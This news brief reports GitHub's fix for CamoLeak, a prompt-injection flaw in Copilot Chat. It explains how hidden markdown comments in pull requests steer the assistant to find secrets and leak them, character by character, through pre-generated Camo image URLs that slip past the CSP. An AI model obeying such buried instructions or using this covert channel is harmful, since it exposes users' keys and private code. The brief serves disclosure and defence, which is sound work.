GitHub patches Copilot Chat flaw that could leak secrets
Briefly

GitHub patches Copilot Chat flaw that could leak secrets
"Researcher Omer Mayraz of Legit Security disclosed a critical vulnerability, dubbed CamoLeak, that could be used to trick Copilot Chat into exfiltrating secrets, private source code, and even descriptions of unpublished vulnerabilities from repositories. The flaw was scored 9.6 on the CVSS scale in the disclosure. The root cause is simple. Copilot Chat runs with the permissions of the signed-in user and ingests contextual text that humans might not see."
"GitHub's Content Security Policy (CSP) and its image-proxy service, Camo, are supposed to stop arbitrary outbound requests, but Mayraz "created a dictionary of all letters and symbols in the alphabet" and pre-generated corresponding Camo-proxied image URLs, effectively mapping each character to a distinct, legitimate Camo URL. The poisoned prompt then instructed Copilot to render the discovered secret as a sequence of 1x1 pixel images."
Copilot Chat operates with the permissions of the signed-in user and ingests contextual repository text that may be invisible in the web UI. An attacker can hide malicious prompts in markdown comments inside pull requests or issues that do not render in the standard UI but are parsed by the chatbot. When a maintainer asks Copilot to review or summarize changes, the assistant can follow buried instructions and search the repository for API keys, tokens, source files, or unpublished vulnerability descriptions. GitHub's CSP and Camo image-proxy were bypassed by mapping characters to pre-generated Camo URLs and rendering secrets as sequences of 1x1 images, enabling covert exfiltration.
Read at Theregister
Unable to calculate read time
[
|
]